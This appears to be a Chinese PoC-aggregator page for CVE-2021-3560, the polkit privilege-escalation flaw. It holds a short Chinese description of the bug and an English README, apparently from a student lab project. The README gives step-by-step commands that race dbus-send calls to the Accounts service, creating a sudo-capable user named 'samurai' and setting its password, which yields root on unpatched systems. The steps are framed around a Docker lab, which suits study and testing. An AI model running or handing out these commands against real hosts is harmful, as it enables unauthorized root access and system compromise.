关联漏洞
标题:
polkit 代码问题漏洞
(CVE-2021-3560)
描述:polkit是一个在类 Unix操作系统中控制系统范围权限的组件。通过定义和审核权限规则,实现不同优先级进程间的通讯。 polkit 存在代码问题漏洞,该漏洞源于当请求进程在调用polkit_system_bus_name_get_creds_sync之前断开与dbus-daemon的连接时,该进程无法获得进程的唯一uid和pid,也无法验证请求进程的特权。
介绍
# CVE-2021-3560-Polkit-Privilege-Escalation
by Mark, Qingchen Yu
To build the container with
```
docker build -t <image tag of your choice> .
```
To run the container
```
docker run -it <image tag name>
```
1. start with ``start.sh``
2. Measura Execution Time:
Note the 'real' time and calculate half of it.
```
time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:samurai string:"Samurai" int32:1
```
3. Create a User with Sudo Privileges:
Replace X.XXX with half of the 'real' time above because we want the process to be interrupted in the middle
the command will run as a loop of 10000 times
You may need to run this step several times
```
for counter in {1..10000}; do dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:samurai string:"Samurai" int32:1 & sleep X.XXXs; kill $!;done
```
4. Check User creation
``
id samurai
``
It should show samurai user exists and show his permissions. Run the step 2 again if not.
5. Generate Password Hash:
in this case, password would be 'iamsamurai'
Note the hash generated.
```
openssl passwd -5 iamsamurai
```
6. Set Password for New User:
Replace X.XXX with the sleep duration and Password Hash with the hash from step 4. Replace UUUU with the user ID of 'samurai'
```
for counter in {1..10000}; do dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/UserUUUU org.freedesktop.Accounts.User.SetPassword string:'Password Hash' string:GoldenEye & sleep X.XXXs; kill $!;done
```
7. Switch to new user with the password you created in step 4.
``su - samurai``
Now you should be able to use 'sudo with this user'.
文件快照
[4.0K] /data/pocs/9faa3fe919c02dd8e3d8cf1b2e15221ab368d5c0
├── [9.0K] lessson.md
├── [ 32K] manual CVE-2021-3560-Polkit-Privilege-Escalation.pdf
├── [144K] Original Project Report.pdf
├── [ 11K] poc.sh
└── [1.9K] README.md
0 directories, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。